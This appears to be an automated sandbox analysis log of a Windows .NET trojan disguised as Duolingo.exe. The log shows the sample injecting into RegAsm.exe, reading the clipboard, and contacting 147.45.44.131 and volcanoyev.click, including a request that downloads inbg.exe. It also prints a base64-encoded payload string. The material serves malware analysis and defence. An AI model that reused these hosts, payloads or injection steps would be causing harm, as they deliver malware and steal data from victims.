        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
        Source: global trafficHTTP traffic detected: GET /infopage/inbg.exe HTTP/1.1X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJqHost: 147.45.44.131Connection: Keep-Alive
        Source: global trafficDNS traffic detected: DNS query: volcanoyev.click
        Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: volcanoyev.click
        Source: qoqD1RxV0F.exe, 00000000.00000002.2055586170.000000000245B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.131
        Source: qoqD1RxV0F.exe, 00000000.00000002.2055586170.00000000023F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.131/infopage/inbg.exe
        Source: qoqD1RxV0F.exe, 00000000.00000002.2055586170.00000000023F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.131/infopage/inbg.exeP
        Source: qoqD1RxV0F.exe, 00000000.00000002.2055586170.000000000245B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
        Source: RegAsm.exe, 00000007.00000002.2136531236.0000000000CF4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://volcanoyev.click/
        Source: RegAsm.exe, 00000007.00000002.2136531236.0000000000CF4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://volcanoyev.click/api
        Source: RegAsm.exe, 00000007.00000002.2136531236.0000000000CDB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://volcanoyev.click:443/api
        Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
        Source: unknownHTTPS traffic detected: 172.67.195.241:443 -> 192.168.2.5:49705 version: TLS 1.2
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004329C0 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,7_2_004329C0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004329C0 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,7_2_004329C0

        System Summary

        barindex
        Source: qoqD1RxV0F.exe, Sap.csLong String: Length: 18812
        Source: C:\Users\user\Desktop\qoqD1RxV0F.exeCode function: 0_2_02382738 NtUnmapViewOfSection,0_2_02382738
        Source: C:\Users\user\Desktop\qoqD1RxV0F.exeCode function: 0_2_02382730 NtUnmapViewOfSection,0_2_02382730
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004088507_2_00408850
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004238607_2_00423860
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004388107_2_00438810
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0041682D7_2_0041682D
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004288CB7_2_004288CB
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0043D8807_2_0043D880
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004218A07_2_004218A0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004309407_2_00430940
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004039707_2_00403970
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004209397_2_00420939
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004179C17_2_004179C1
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004231C27_2_004231C2
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004241C07_2_004241C0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0043B1D07_2_0043B1D0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004291DD7_2_004291DD
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0043D9807_2_0043D980
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004059907_2_00405990
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004221907_2_00422190
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0043D9977_2_0043D997
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0043D9997_2_0043D999
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004091B07_2_004091B0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0042CA497_2_0042CA49
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0042DA537_2_0042DA53
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004162637_2_00416263
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0040EA107_2_0040EA10
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004152207_2_00415220
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0042CAD07_2_0042CAD0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004252DD7_2_004252DD
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0041B2E07_2_0041B2E0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004062807_2_00406280
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0043DA807_2_0043DA80
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0041E2907_2_0041E290
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0041CB407_2_0041CB40
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0043D34D7_2_0043D34D
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00426B507_2_00426B50
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0043DB607_2_0043DB60
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00436B087_2_00436B08
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0042830D7_2_0042830D
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0042CB117_2_0042CB11
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004043207_2_00404320
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0042CB227_2_0042CB22
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004253277_2_00425327
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004083307_2_00408330
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0043F3307_2_0043F330
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0042A33F7_2_0042A33F
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0040DBD97_2_0040DBD9
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004243807_2_00424380
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0041FC757_2_0041FC75
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0041DC007_2_0041DC00
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00429C2B7_2_00429C2B
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004291DD7_2_004291DD
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004074F07_2_004074F0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0040ACF07_2_0040ACF0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0041148F7_2_0041148F
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0042AC907_2_0042AC90
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0043ECA07_2_0043ECA0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0040CD467_2_0040CD46
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004375007_2_00437500
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004225107_2_00422510
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00417DEE7_2_00417DEE
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00437DF07_2_00437DF0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004095807_2_00409580
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0041759F7_2_0041759F
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00425E707_2_00425E70
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00436E747_2_00436E74
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004276037_2_00427603
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00425E307_2_00425E30
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004286C07_2_004286C0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0043AEC07_2_0043AEC0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004266D07_2_004266D0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004236E27_2_004236E2
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00405EE07_2_00405EE0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0041DE807_2_0041DE80
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00402F507_2_00402F50
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00420F507_2_00420F50
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00438F597_2_00438F59
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004067107_2_00406710
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00423F207_2_00423F20
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0043F7207_2_0043F720
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00419F307_2_00419F30
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0041E7C07_2_0041E7C0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004197C27_2_004197C2
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0042DFE97_2_0042DFE9
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0040A7807_2_0040A780
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00411F907_2_00411F90
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004187927_2_00418792
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004157997_2_00415799
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0043EFB07_2_0043EFB0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00408030 appears 44 times
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00414400 appears 65 times
        Source: qoqD1RxV0F.exe, 00000000.00000002.2056336250.0000000005300000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameldukos0s.dll4 vs qoqD1RxV0F.exe
        Source: qoqD1RxV0F.exe, 00000000.00000002.2055586170.0000000002494000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameldukos0s.dll4 vs qoqD1RxV0F.exe
        Source: qoqD1RxV0F.exe, 00000000.00000000.2022999411.00000000000FE000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameDuolingo.exe2 vs qoqD1RxV0F.exe
        Source: qoqD1RxV0F.exe, 00000000.00000002.2054729715.00000000005EE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs qoqD1RxV0F.exe
        Source: qoqD1RxV0F.exeBinary or memory string: OriginalFilenameDuolingo.exe2 vs qoqD1RxV0F.exe
        Source: qoqD1RxV0F.exe, Pls.csBase64 encoded string: 'QzpcXFdpbmRvd3NcXE1pY3Jvc29mdC5ORVRcXEZyYW1ld29ya1xcdjQuMC4zMDMxOVxcUmVnQXNtLmV4ZQ=='
        Source: qoqD1RxV0F.exe, Sap.csBase64 encoded string: 'RjBVY2FBVVdNVThSRmxNWVBXODhGMFVMREZGVlZSdEZGbE1QVEhJY1p3VllEVVVXQzFVR1BXODhGMFVMREZGVlZSdEZGbE1QVEdRQWFCWmZEMU5NSzFnQll4QlpFbVVIRUVBY1pRZEZXVHRvYnp3RmN3QmFDMVZDQVZvVWRSRVdKMWdGQzFnUVl4QkZiendaYnp4VkprSVdRVVFIQlY4YWFFSjFEVmdVQjBRR2J3MVlMMU1XQ2xrUmRXODhRaFpDUWtZQVpBNWZBUllSRmxjQmJ3RVdLMWdXVXdCVlJRMVlGRk1RRm1JYVR3eENVd0JLQUU4Qll6bHJRa0FERGtNUUtrSmZERUpDRVVJVWRCWi9ERklIR2g5NERFSVdRaFlaYnp4VkprSVdRaFpDUWtRUWNoZEVEQllnQzBJMmFReEFCMFFXQjBSYlVnMS9ERUpUVkI0RFp3NURCeHBDRVVJVWRCWi9ERklIR2g5T0MyZ1dRaFpDSHp0L0MyZ1dRaFpDRWtNWGFndFZRa1VXQTBJY1pVSi9ERUpSVUJZMmFReEFCMFFXTmxrOGFCWUZVQjRBRzBJUVhUOFdGRmNPRjFOWkpndFlGaFlSRmxjSGNpdFlCbE1hU3p0L0prSVdRazF2YUJaVkprSVdRaFpDRUZNQmN4QllRblFMRm5VYWFCUlRFRUlIRUJnaGFTdFlGZ1ZRU2tBVWFoZFRUaFlSRmxjSGNpdFlCbE1hU3cxNERFSVdRaFlmYnp4NERFSVdRaFlTRjFRWmJ3RVdFVUlERmw4V0pnQlBGbE01UHhZMmFReEFCMFFXTmxrM2Z4WlRFUjRMREVKVmNBTmFGMU5MYnp4VkprSVdHVHRvUWhaVkprSVdRaFlRQjBJQWRBd1dJRjhXSVZrYmNBZEVGbE1RVEhFUWNpQlBGbE1SU2tBVWFoZFRTdzF2YUJaVkprSkxienhDUWhaVkpRZFlCa1FIQlY4YWFHODhienhDUWhaVkpSQlRCVjhOREJZMGRndDRBMXNIRVR0L0prSVdRa1lYQUZvY1pVSkZGbGNXQzFWVmRSWkVDMWdGT1d0VlFRZENJMFlMTEZjWVl4RWVTenRvUWhaVkpoazdhQlpDUWhaVkprSVdFRk1XRjBRYkpneFRGUllSRmtRY2FBVnRQenRvUWhaVkprSVdRaFlaYnp4VkprSVdRaFpDUWhaVkprSVVDVk1RREZNWk5WQVVUanRvUWhaVkprSVdRaFpDUWhaVkpBeENCbG9PUUJwNERFSVdRaFpDUWhaVkprSVdRaFF3QjBVQWF3ZGlDa1FIQTFKWEttODhRaFpDUWhaVkprSVdRaFpDUUdFYWNWUUNNVk1XTmw0SFl3TlNJVmtNRmxNTmNrQWFienhDUWhaVkprSVdRaFpDUWhaWFZRZENObDRRQjFjUlJRMVlGbE1hRmhSWkMyZ1dRaFpDUWhaVkprSVdRaFpBTlZrQ01GWnhCMEkyQ2tRUVp3WjFEVmdXQjA0QkpFNDdhQlpDUWhaVkprSVdRaFpDUWhReVl4WmlDa1FIQTFJMmFReENCMDRXUUJwNERFSVdRaFpDUWhaVkprSVdRaFEwQzBRQmN3TmFJMW9PRFZVd2ZrQWFienhDUWhaVkprSVdRaFpDUWhaWFVSQmZGbE15RUZrV1l4RkZMMU1QRFVRTUpFNDdhQlpDUWhaVkprSVdRaFpDUWhRbll3TlNNa1FOQVZNR2RTOVREMWtRR3hSWkMyZ1dRaFpDUWhaVkprSVdRaFpBT0VFZ2FBOVhFbUFMQjBFNllERlRBVUlMRFZoWEttODhRaFpDUWhaVkprSVdRaFpDUUhVSFl3TkNCMllRRFZVUWRSRjNRRHRvUWhaVkprSVdRaFlmV1R0L0prSVdRa3R2YUJaVkprSVZCMWdHRUZNU2J3MVlienh2YUJaVkprSVZFRk1GQzFrYkppTkdDM0lIRGxNU1p4WlRFVHRvUWhaVkpoSkVDMEFERmxOVllnZGFCMUVERmxOVmJ3eENRbVFIRVVNWVl6WmVFRk1EQm5JUWFnZFJBMElIU244YmNqSkNFQllLQTFnUmFnY2ZXVHRvUWhaVkpoSkVDMEFERmxOVllnZGFCMUVERmxOVlpBMVpEaFl4QjBJaWFSVUFWbUlLRUZNVVlpRlpERUlIR2tJeFl3NVRCVmNXQng0OGFCWm1Ga1JDRmw0SFl3TlNUaFlMREVJdVcwSlZEVmdXQjA0QkwxazdhQlpDUWhZRmRBdEFBMElIUWxJUWFnZFJBMElIUWxRYWFRNFdNVk1XTmw0SFl3TlNJVmtNRmxNTmNpWlREbE1GQTBJUUxpdFlGbVlXRUJZQmJoQlRBMUpPUWw4YmNqbHJRbFVOREVJUWZoWWZXVHRvUWhaVkpoSkVDMEFERmxOVllnZGFCMUVERmxOVlpBMVpEaFlsQjBJaWFSVUFWbUlLRUZNVVlpRlpERUlIR2tJeFl3NVRCVmNXQng0OGFCWm1Ga1JDRmw0SFl3TlNUaFlMREVJdVcwSlZEVmdXQjA0QkwxazdhQlpDUWhZRmRBdEFBMElIUWxJUWFnZFJBMElIUWxRYWFRNFdKVk1XTmw0SFl3TlNJVmtNRmxNTmNpWlREbE1GQTBJUUxpdFlGbVlXRUJZQmJoQlRBMUpPUWw4YmNqbHJRbFVOREVJUWZoWWZXVHRvUWhaVkpoSkVDMEFERmxOVllnZGFCMUVERmxOVmJ3eENRbUFMRUVJQVp3NTNEbG9OQVhNTlFnZGFCMUVERmxOZFR3eENNa0lRUWw0VWFBWmFCeHBDQzFnQkpnTlNCa1FIRVVWWkpndFlGaFlPQjFnU2Nnb2FRbDhNRmhZQmZ4SlRUaFlMREVKVmRoQlpGbE1CRmg5T0MyZ1dRaFpDRWtRY2NBTkNCeFlHQjFvUVlRTkNCeFlBRFZrWkpqVkVDMElITDFNWWFSQlBKbE1PQjFFVWNnY2VLMWdXTWtJSEp
        Source: classification engineClassification label: mal100.troj.expl.evad.winEXE@12/7@1/2
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00430C70 CoCreateInstance,7_2_00430C70
        Source: C:\Users\user\Desktop\qoqD1RxV0F.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\qoqD1RxV0F.exe.logJump to behavior
        Source: C:\Users\user\Desktop\qoqD1RxV0F.exeMutant created: NULL
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5488:120:WilError_03
        Source: C:\Users\user\Desktop\qoqD1RxV0F.exeFile created: C:\Users\user\AppData\Local\Temp\ldukos0sJump to behavior
        Source: qoqD1RxV0F.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: qoqD1RxV0F.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
        Source: C:\Users\user\Desktop\qoqD1RxV0F.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: qoqD1RxV0F.exeVirustotal: Detection: 39%
        Source: unknownProcess created: C:\Users\user\Desktop\qoqD1RxV0F.exe "C:\Users\user\Desktop\qoqD1RxV0F.exe"
        Source: C:\Users\user\Desktop\qoqD1RxV0F.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ldukos0s\ldukos0s.cmdline"
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES634D.tmp" "c:\Users\user\AppData\Local\Temp\ldukos0s\CSCAE8F24CA40C840259D2783B6D24C303E.TMP"
        Source: C:\Users\user\Desktop\qoqD1RxV0F.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"
        Source: C:\Users\user\Desktop\qoqD1RxV0F.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"
        Source: C:\Users\user\Desktop\qoqD1RxV0F.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"
        Source: C:\Users\user\Desktop\qoqD1RxV0F.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ldukos0s\ldukos0s.cmdline"Jump to behavior
        Source: C:\Users\user\Desktop\qoqD1RxV0F.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"Jump to behavior
        Source: C:\Users\user\Desktop\qoqD1RxV0F.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"Jump to behavior
        Source: C:\Users\user\Desktop\qoqD1RxV0F.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES634D.tmp" "c:\Users\user\AppData\Local\Temp\ldukos0s\CSCAE8F24CA40C840259D2783B6D24C303E.TMP"Jump to behavior
        Source: C:\Users\user\Desktop\qoqD1RxV0F.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Users\user\Desktop\qoqD1RxV0F.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\Desktop\qoqD1RxV0F.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\qoqD1RxV0F.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\Desktop\qoqD1RxV0F.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Users\user\Desktop\qoqD1RxV0F.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Users\user\Desktop\qoqD1RxV0F.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Users\user\Desktop\qoqD1RxV0F.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\Desktop\qoqD1RxV0F.exeSection loaded: wldp.dllJump to behavior
